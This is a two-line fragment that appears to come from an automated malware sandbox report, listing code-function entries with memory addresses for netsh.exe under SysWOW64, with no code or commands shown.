          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B19E4015_2_00B19E40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 15_2_00B12FB015_2_00B12FB0